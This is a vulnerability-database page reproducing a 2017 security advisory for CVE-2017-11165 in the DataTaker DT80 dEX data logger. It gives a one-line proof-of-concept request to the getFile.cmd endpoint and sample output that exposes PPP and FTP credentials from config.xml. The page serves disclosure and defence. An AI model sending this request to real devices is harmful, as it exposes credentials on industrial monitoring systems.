Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNassim AsrirPACKETSTORM:143328
HistoryJul 12, 2017 - 12:00 a.m.

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure

2017-07-1200:00:00
Nassim Asrir
packetstormsecurity.com
49

0.943 High

EPSS

Percentile

99.2%

JSON
`[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure  
[+] Credits / Discovery: Nassim Asrir  
[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/  
[+] Author Company: Henceforth  
[+] CVE: CVE-2017-11165  
  
Vendor:  
===============  
  
http://www.datataker.com/  
  
  
About:  
========  
  
The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display.  
  
The dataTaker DT80as Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution.   
  
Vulnerability Type:  
===================  
  
Sensitive Configurations Exposure.  
  
  
issue:  
===================  
  
dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via  
a direct request for the /services/getFile.cmd?userfile=config.xml URI.  
  
POC:  
===================  
  
http://victim/services/getFile.cmd?userfile=config.xml  
  
  
Output:  
========  
  
<config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0">  
<environment>  
<application version="1.50.012" build="2014-01-07, 15:16:53"/>  
<flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/>  
<operatingSystem version="Windows 7"/><firmware version="9.14.5407"/>  
<screen resolution="1024x768"/>  
</environment>  
  
etc....  
  
<loggerSetting category="PPP" profile="USER">username</loggerSetting>  
  
<loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting>  
  
<loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting>  
  
<loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting>  
  
<loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting>  
  
<loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting>  
  
`

Related

exploitpack 1
cvelist 1
zdt 1
nvd 1
nuclei 1
prion 1
cve 1
exploitdb 1
exploitpack
exploitpack
DataTaker DT80 dEX 1.50.012 - Information Disclosure
2017-07-11 00:00:00
cvelist
cvelist
CVE-2017-11165
2017-07-12 12:00:00
zdt
zdt
DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure Vulnerability
2017-07-12 00:00:00
nvd
nvd
CVE-2017-11165
2017-07-12 12:29:00
nuclei
nuclei
DataTaker DT80 dEX 1.50.012 - Information Disclosure
2023-01-15 12:41:22
prion
prion
Information disclosure
2017-07-12 12:29:00
cve
cve
CVE-2017-11165
2017-07-12 12:29:00
exploitdb
exploitdb
DataTaker DT80 dEX 1.50.012 - Information Disclosure
2017-07-11 00:00:00

0.943 High

EPSS

Percentile

99.2%

JSON
Related for PACKETSTORM:143328
exploitpack1cvelist1zdt1nvd1nuclei1prion1cve1exploitdb1